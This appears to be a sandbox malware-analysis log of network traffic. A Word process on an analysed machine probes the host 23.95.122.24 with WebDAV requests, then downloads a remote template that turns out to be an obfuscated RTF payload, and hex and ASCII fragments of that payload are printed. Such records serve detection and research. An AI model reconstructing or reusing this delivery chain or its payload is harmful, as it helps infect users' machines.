72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:17:59.663270950 CEST	5	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e Data Ascii: PROPFIND /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:17:59.795531034 CEST	5	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:18:00 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:18:00.985110044 CEST	6	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e Data Ascii: PROPFIND /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:01.108045101 CEST	6	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 08 Apr 2021 11:18:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ Content-Length: 389 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:18:01.108861923 CEST	7	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e Data Ascii: PROPFIND /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:01.238528013 CEST	7	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:18:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:18:05.495172024 CEST	433	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:05.619119883 CEST	433	IN	HTTP/1.1 302 Found Date: Thu, 08 Apr 2021 11:18:06 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Location: http://23.95.122.24/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Apr 8, 2021 13:18:05.619648933 CEST	433	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:05.745157957 CEST	434	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:18:06 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:18:09.682003975 CEST	434	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:09.805407047 CEST	435	IN	HTTP/1.1 302 Found Date: Thu, 08 Apr 2021 11:18:10 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Location: http://23.95.122.24/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Apr 8, 2021 13:18:09.805866957 CEST	435	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:18:09.930573940 CEST	435	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 08 Apr 2021 11:18:11 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:18:01.397147894 CEST	8	OUT	GET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 23.95.122.24 Connection: Keep-Alive
Apr 8, 2021 13:18:01.518948078 CEST	9	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:18:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT ETag: "3263-5bf65b3dc8631" Accept-Ranges: bytes Content-Length: 12899 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 7b 5c 72 74 66 33 31 35 37 26 3f 5e 3a 34 39 39 3f 39 25 a7 37 34 26 b5 30 7e a7 3b 40 3f 21 2e 3f 3e a7 7e 27 36 3a 23 a7 5f 3c 2e 28 38 29 2d 3f 2a 2f 3a 5d 40 36 21 34 27 60 60 39 2e 28 24 34 7c 27 25 3b 21 21 36 7c 35 3f 39 2e 3c 40 3a 3b 2b 5b 5e 7e 23 25 27 7c 5e 3f 2e 2e 5d 35 3d 25 37 37 5e 3a 5f 3c 33 2f 35 3f 3e 7e 3a 3c 2f 38 32 3b 3e b5 3f 3e 3f 35 3c 3f 60 60 5f 7c 7e b5 3e 3e 3f 40 32 27 5f 25 31 3a 3f 33 24 3f 23 24 37 34 23 2b 38 3f 40 3f 37 21 33 3f 3b 3f 34 3f 7c 2c 2c 3f 3b 2f 2f 29 23 25 26 b5 b0 7c 25 3f 30 32 3e 39 3e 7c a7 5f 34 2a 2c 2f 26 5d 39 3f 26 31 2d 21 a7 b5 7c 30 26 b5 40 3f a7 38 38 3f 25 25 3b 3b 28 33 60 38 3f 5b 2a b0 2b 2a 5e 34 26 32 39 7c 25 35 2a 7c 3f 31 7c 25 3d 31 5d 5e 2b 29 28 5b 2c 2d b0 3f 30 5e 40 29 23 3a 2a 35 3f 5e 27 5f 3f 38 5b 39 3f a7 3f 2b 2b 2d 34 21 5f 39 2c b0 25 b0 b0 33 3b 7e 3f 26 24 23 3b 25 3d 36 2b 35 33 7e 3c b0 33 30 7c 34 7c 40 37 27 2f 3d 3a 2d 34 3b 3e 60 27 3a 2c 25 60 30 5b 3f 60 31 3f 2d 3f 3f 3f 2b 3d 3a 5b 3f 2a 3f 2b 36 27 3f 27 3c 7c 31 3f 3a 34 26 3b 2b 3e a7 5e 29 7c 7c 25 35 38 3d 7c 29 b0 34 3c 2e 38 34 3c 2f 27 25 5f 39 33 2c 40 5b 3b 3f 37 30 5b 3f 35 25 b5 3b 21 5b b0 3f 3a 32 7e 2d 36 2d 25 24 3f 5f 3f 36 34 5b 3f 3d 37 2f 3f 3f 3f 3c 39 b5 27 32 7c a7 33 3f 5b 3f 32 3f 3b 21 37 35 2e 2a 5f 3f 37 3f 33 2c 60 27 38 2d 36 3f 3f b5 36 a7 29 b5 29 27 3f 31 3c 3d a7 2e 5d 21 25 39 38 2d 31 3f 24 37 30 25 3f 35 3f 7c 2e 36 7c 24 3d 21 3d 35 21 31 34 24 40 27 b5 25 3e 5d 5b 3f 31 36 33 3f 29 35 2b 2e 35 36 5b 3d 25 34 37 39 5b b5 5d 60 37 27 3a 25 b0 3c 3f 24 2d 38 33 37 7c 3d b0 60 2d a7 3f 33 25 3f 7c 3f 29 2a 21 36 3d 5e 2c 35 3c 3d 3f 7c 5b 29 3e 2a 3d 25 25 7e 38 b0 a7 2f 3b 21 3d 7e 3d 3f 3a 5d 29 35 3e 25 39 26 24 27 21 28 32 2f 32 29 5b 23 40 3b 38 3f 3f 24 38 5e 23 3f 2d 3c 2c 40 3f 3d 3f 3c 39 39 2e 60 38 b5 2e 35 2f 34 60 21 23 40 24 40 3f 2d 38 30 37 2d 28 3f 3f 3a 2a 2e 2e 38 35 27 3f 60 2e 3f 5b 7e 37 25 2d 2f 2a 38 3c 3b 26 35 23 3f 33 32 33 7e 3c 2e 3e 3d 38 27 3b 3f 3f 2d 38 3f 30 3f 33 5e 3f 3f a7 7e 31 2e 25 34 60 b5 3f 24 3f 25 39 a7 3d 3b 7e 35 37 29 b0 5e 3f 24 3a 29 5b b0 37 38 30 2d a7 3f a7 2a 38 b5 31 b5 3e 3f 25 3d 5b 37 23 25 38 3b 2a 60 33 3b 28 30 33 27 b5 38 23 3f 2a 3f 39 3e 39 27 23 30 2d 2c 2b 2f 3d b5 25 3f 2a 26 39 2d 3f 2b 38 7e 2e 31 29 27 2a 33 32 3f 40 3b 60 7e 31 3f 28 32 7e 25 38 5b 3e 5e 29 3f 21 5b 25 2a 33 2f 3f 29 3e 3f 36 23 a7 3b 23 3f 5b 3b 3e b5 2d 3f 2c 3c 2b 32 39 3a 3d 3f 5f 32 25 2b 33 29 35 29 2c 29 a7 3b 39 2a 32 40 2f 33 29 3d 3e 2e 2b 23 a7 33 7c 25 30 2e 5d 33 3c 21 26 5b 2c 7e 2f 36 39 2c 3f b0 3f 5e 30 2c 7e 31 2e 3b 2c 3b 5e 3f 25 3f 25 b5 31 40 5f 7e 40 3f 2d 3f 39 39 7c 5e 31 39 24 23 25 7c 23 5d 3a 2a 2a b5 37 33 37 25 5d 3f 25 3f 2b 2f 29 3f 5b 3f 25 31 33 b0 b0 31 25 31 b0 40 25 2c 27 23 3b 3c 28 3b 21 5b 31 33 3e 25 21 2c 33 2d 2e 21 5b 25 26 27 5d 37 3a 3f 36 35 3b 33 33 7c 5d 3c 3f 30 40 3a 2d 2e 27 32 5e 26 3f 2d a7 3c 2f 3c 27 37 3f 3d 40 3f 24 28 5e 2a 33 33 5d 25 30 3a 32 3f b0 26 5f 3f 21 34 3c b5 b0 5b 27 33 3d 2e 7e 25 35 29 25 24 a7 36 7c 3d 38 28 5e a7 28 21 39 37 32 3f 3e 5d 3e 34 7e 3c 2b 33 7c 2b 3f 30 2e 2a 3c 32 2e 3f 29 2e 3f 3b 7e Data Ascii: {\rtf3157&?^:499?9%74&0~;@?!.?>~'6:#_<.(8)-?/:]@6!4'``9.($4\|'%;!!6\|5?9.<@:;+[^~#%'\|^?..]5=%77^:_<3/5?>~:</82;>?>?5<?``_\|~>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?\|,,?;//)#%&\|%?02>9>\|_4,/&]9?&1-!\|0&@?88?%%;;(3`8?[+^4&29\|%5\|?1\|%=1]^+)([,-?0^@)#:5?^'_?8[9??++-4!_9,%3;~?&$#;%=6+53~<30\|4\|@7'/=:-4;>`':,%`0[?`1?-???+=:[??+6'?'<\|1?:4&;+>^)\|\|%58=\|)4<.84</'%_93,@[;?70[?5%;![?:2~-6-%$?_?64[?=7/???<9'2\|3?[?2?;!75._?7?3,`'8-6??6))'?1<=.]!%98-1?$70%?5?\|.6\|$=!=5!14$@'%>][?163?)5+.56[=%479[]`7':%<?$-837\|=`-?3%?\|?)!6=^,5<=?\|[)>=%%~8/;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8.5/4`!#@$@?-807-(??:..85'?`.?[~7%-/8<;&5#?323~<.>=8';??-8?0?3^??~1.%4`?$?%9=;~57)^?$:)[780-?81>?%=[7#%8;`3;(03'8#??9>9'#0-,+/=%?&9-?+8~.1)'32?@;`~1?(2~%8[>^)?![%3/?)>?6#;#?[;>-?,<+29:=?_2%+3)5),);92@/3)=>.+#3\|%0.]3<!&[,~/69,??^0,~1.;,;^?%?%1@_~@?-?99\|^19$#%\|#]:737%]?%?+/)?[?%131%1@%,'#;<(;![13>%!,3-.![%&']7:?65;33\|]<?0@:-.'2^&?-</<'7?=@?$(^33]%0:2?&_?!4<['3=.~%5)%$6\|=8(^(!972?>]>4~<+3\|+?0.*<2.?).?;~
Apr 8, 2021 13:18:01.518975973 CEST	11	IN	Data Raw: 2e 34 5f 23 32 b5 36 3f 3f 27 3c 5b 5e 23 5e 37 27 5d 3f 3a 30 36 3b 60 35 60 2e 7e 27 21 38 35 2a 35 a7 25 a7 3f 3d 34 b0 36 3f 5f 27 7e 2b 24 25 3c 30 3b 7e 3d 3c 28 7e 29 36 5d 2e 40 b0 31 60 26 3f 3f b5 3b 21 31 35 2b 3f 33 21 5f 2e 5b 32 34 Data Ascii: .4_#26??'<[^#^7']?:06;`5`.~'!855%?=46?_'~+$%<0;~=<(~)6].@1`&??;!15+?3!_.[2438_#%)6~9^3[?>[0`85\|??5&:$9?%%2/`?.4+?,>,5@>4?,]5,)4)]9`19-?!?-/.<??=,%&4?901#\|7/7\|6!'?;91%@[`2[@+;=~$:[`1%_1?.5>>:<_\|*.8!:'\|#?`>8!28(5+3_&/--;;=_[
Apr 8, 2021 13:18:01.518990040 CEST	12	IN	Data Raw: 21 25 24 60 28 35 24 3e 3e 25 27 2e 2b 3f b5 3e 7c 36 5e 24 2c 25 3f 33 25 23 3f 38 30 2f b0 35 3f 3d 2f 33 60 27 7e 7e 28 3c 7c 3f 33 3b 32 5d 35 29 2d 2f 2c 2f 7e 5e 34 3f b5 2d 37 7c 33 21 3f 29 3b 2b 30 3a 5b 38 7e 60 32 3e 7c 26 29 30 b0 2e Data Ascii: !%$`(5$>>%'.+?>\|6^$,%?3%#?80/5?=/3`'~~(<\|?3;2]5)-/,/~^4?-7\|3!?);+0:[8~`2>\|&)0.?(<'=)@5?-,]3']?#=%??2#2=!4#:\|6#+\|`+^58=?.~^&&%%@>%=>~[+`??^64&=?=48]&?1;#39<8?341`9?4\|[&68=-0!],!+\|.29%4./`*2?_%/3;%,\|?:+;$348:2?(>_?:#4'<%?0~$'
Apr 8, 2021 13:18:01.519002914 CEST	14	IN	Data Raw: 7e 36 2b 2b b0 3b 3f 3f a7 2a 7e 3d 5b 5d 2d 30 7c 3c 2d 3f 7e 2d b0 2f 3e 36 30 3d b0 7e 2f 21 33 29 27 3c 7e 60 7e a7 25 25 38 3e 23 2f 38 5b 2a 3e 21 3f 35 28 39 3f b0 39 2b 37 3f 36 2d b0 31 2f 3f 5f 32 b5 40 3f 3b 3f 39 32 5e a7 23 3f b0 37 Data Ascii: ~6++;??~=[]-0\|<-?~-/>60=~/!3)'<~`~%%8>#/8[>!?5(9?9+7?6-1/?_2@?;?92^#?78@]~/#`4=+?~6',.6[%,]_+!2/'[(,+>48>553/$-?3?;.%!>:5-??`2[?1!?/958_^%:%;(_]%?:%2?`.15:>2.$%\|5??^:'7+)$_`1-1-%?48[%=[?5$=.:$.%4@+%![~<75-99%:?)!?
